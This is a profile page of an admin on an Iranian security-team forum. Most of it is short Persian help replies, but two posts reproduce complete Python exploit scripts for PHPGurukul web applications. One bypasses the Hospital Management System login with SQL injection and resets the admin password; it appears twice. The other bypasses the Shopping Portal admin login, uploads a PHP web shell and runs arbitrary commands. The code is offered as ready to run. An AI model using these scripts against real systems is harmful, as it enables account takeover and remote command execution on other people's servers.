رفتن به مطلب
انجمن تیم امنیتی گارد ایران

proxy

مدیر ارشد
  • تعداد ارسال ها

    769
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    98

Other groups

مدیر ارشد

proxy آخرین باز در روز دی 6 برنده شده

proxy یکی از رکورد داران بیشترین تعداد پسند مطالب است !

درباره proxy

  • تاریخ تولد ۹ آذر ۱۳۷۸

اطلاعات فردی

  • محل سکونت
    Tehran
  • جنسیت
    Not Telling

آخرین بازدید کنندگان نمایه

9,606 بازدید کننده نمایه
  1. باید هر زبانی رو که دارین مینویسید کامپایارش رو نصب کنید و انتخابش کنید کنار همون قسمت که دکمه ران هست کامپایلر هم هست اونو چک کنید
  2. بخش vip برای همین ساخته شده دوست عزیز https://www.prnsscollege.ac.in/new.php
  3. proxy

    Hospital Management System 4.0 - Authentication Bypass

    # Exploit Title: Hospital Management System 4.0 - Authentication Bypass # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/hospital-management-system-in-php/ # Version: v4.0 # Category: Webapps # Tested on: Xampp for Windows # Description: # Password and username parameters have sql injection vulnerability on admin panel. # username: joke' or '1'='1 , password: joke' or '1'='1 # Exploit changes password of admin user. #!/usr/bin/python import requests import sys if (len(sys.argv) !=2) or sys.argv[1] == "-h": print "[*] Usage: PoC.py rhost/rpath" print "[*] e.g.: PoC.py 127.0.0.1/hospital" exit(0) rhost = sys.argv[1] npasswd = str(raw_input("Please enter at least six characters for new password: ")) url = "http://"+rhost+"/hms/admin/index.php" data = {"username": "joke' or '1'='1", "password": "joke' or '1'='1", "submit": "", "submit": ""} #login with requests.Session() as session: lpost = session.post(url=url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"}) #check authentication bypass check = session.get("http://"+rhost+"/hms/admin/dashboard.php", allow_redirects=False) print ("[*] Status code: %s"%check.status_code) if check.status_code == 200: print "[+] Authentication bypass was successful!" print "[+] Trying to change password." elif check.status_code == 404: print "[-] One bad day! Check target web application path." sys.exit() else: print "[-] One bad day! Authentication bypass was unsuccessful! Try it manually." sys.exit() #change password cgdata = {"cpass": "joke' or '1'='1", "npass": ""+npasswd+"", "cfpass": ""+npasswd+"","submit":""} cgpasswd = session.post("http://"+rhost+"/hms/admin/change-password.php", data=cgdata, headers = {"Content-Type": "application/x-www-form-urlencoded"}) if cgpasswd.status_code == 200: print ("[+] Username is: admin") print ("[+] New password is: %s"%npasswd) else: print "[-] One bad day! Try it manually." sys.exit() hospital_poc.py #!/usr/bin/python import requests import sys if (len(sys.argv) !=2) or sys.argv[1] == "-h": print "[*] Usage: PoC.py rhost/rpath" print "[*] e.g.: PoC.py 127.0.0.1/hospital" exit(0) rhost = sys.argv[1] npasswd = str(raw_input("Please enter at least six characters for new password: ")) url = "http://"+rhost+"/hms/admin/index.php" data = {"username": "joke' or '1'='1", "password": "joke' or '1'='1", "submit": "", "submit": ""} #login with requests.Session() as session: lpost = session.post(url=url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"}) #check authentication bypass check = session.get("http://"+rhost+"/hms/admin/dashboard.php", allow_redirects=False) print ("[*] Status code: %s"%check.status_code) if check.status_code == 200: print "[+] Authentication bypass was successful!" print "[+] Trying to change password." elif check.status_code == 404: print "[-] One bad day! Check target web application path." sys.exit() else: print "[-] One bad day! Authentication bypass was unsuccessful! Try it manually." sys.exit() #change password cgdata = {"cpass": "joke' or '1'='1", "npass": ""+npasswd+"", "cfpass": ""+npasswd+"","submit":""} cgpasswd = session.post("http://"+rhost+"/hms/admin/change-password.php", data=cgdata, headers = {"Content-Type": "application/x-www-form-urlencoded"}) if cgpasswd.status_code == 200: print ("[+] Username is: admin") print ("[+] New password is: %s"%npasswd) else: print "[-] One bad day! Try it manually." sys.exit()
  4. proxy

    Shopping Portal ProVersion 3.0 - Admin Bypass

    # Exploit Title: Shopping Portal ProVersion 3.0 # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/shopping-portal-free-download/ # Version: v4.0 # Category: Webapps # Tested on: Xampp for Windows # Description: # Password and username parameters have sql injection vulnerability on admin panel. # username: joke' or '1'='1'# , password: joke' or '1'='1'# # Also, there isn't any restriction for malicious file uploading in the "Insert Product" section. # This two vulnerabilities occur unauthenticated remote command execution. #!/usr/bin/python import requests import sys import urllib if (len(sys.argv) !=3) or sys.argv[1] == "-h": print "[*] Usage: PoC.py rhost/rpath command" print "[*] e.g.: PoC.py 127.0.0.1/shopping ipconfig" exit(0) rhost = sys.argv[1] command = sys.argv[2] url = "http://"+rhost+"/admin/index.php" data = {"username": "joke' or '1'='1'#", "password": "joke' or '1'='1'#", "submit": ""} with requests.Session() as session: #login lg = login = session.post(url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"}) print ("[*] Status code for login: %s"%lg.status_code) if lg.status_code != 200: print ("One bad day! Check web application path!") sys.exit() #upload file files = {'productimage1': ('command.php', '<?php system($_GET["cmd"]); ?>'), 'productimage2': ('joke.txt', 'joke'), 'productimage3': ('joke.txt', 'joke')} fdata = {"category": "3", "subcategory": "8", "productName": "the killing joke", "productCompany": "blah", "productpricebd": "0", "productprice": "0", "productDescription": "blah<br>", "productShippingcharge": "0", "productAvailability": "In Stock", "productimage1": "command.php", "productimage2": "joke.txt", "productimage3": "joke.txt", "submit": ""} furl = "http://"+rhost+"/admin/insert-product.php" fupload = session.post(url=furl, files=files, data=fdata) print ("[*] Status code for file uploading: %s"%fupload.status_code) if fupload.status_code != 200: print ("One bad day! File didn't upload.") sys.exit() dir = 0 dirr = str(dir) #find uploaded file while True: el = eurl = session.get("http://"+rhost+"/admin/productimages/"+dirr+"/command.php") if el.status_code == 200: print "File Found!" print "Put On A Happy Face!\r\n\r\n" print ("uploaded file location: http://%s/admin/prductimages/%s/command.php?id=%s"%(rhost,dirr,command)) break else: print "trying to find uploaded file..." dir += 1 dirr = str(dir) #exec final=session.get("http://"+rhost+"/admin/productimages/"+dirr+"/command.php?cmd="+command) print final.text
  5. دقیقا چی میخواین بالا بیاریین؟
  6. hashidentifier احتمالا خیلی زیاد اینه Woltlab Burning Board 4.x تا اونجایی که من نگاه کردم بهش BB4 میگن
  7. اول جستجو کنید آموزشهای زیادی در انجمن هست که میتونید استفاده کنید https://www.google.com/search?q=site%3Aguardiran.org+%D8%A7%D8%B6%D8%A7%D9%81%D9%87+%DA%A9%D8%B1%D8%AF%D9%86+%D9%81%D8%A7%D8%B1%D8%B3%DB%8C+%D8%A8%D9%87+%DA%A9%D8%A7%D9%84%DB%8C&oq=site%3Aguardiran.org+%D8%A7%D8%B6%D8%A7%D9%81%D9%87+%DA%A9%D8%B1%D8%AF%D9%86+%D9%81%D8%A7%D8%B1%D8%B3%DB%8C+%D8%A8%D9%87+%DA%A9%D8%A7%D9%84%DB%8C&aqs=chrome..69i57j69i58.22041j0j7&sourceid=chrome&ie=UTF-8
  8. دکمه fn رو بگیر بعد دکمه insert num lk رو بزن ببین درست میشه

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شبکه های اجتماعی

نمادها

logo.aspx?id=56084&Code=ybjZVyBlXag5cNRv logo-samandehi

×
×
  • اضافه کردن...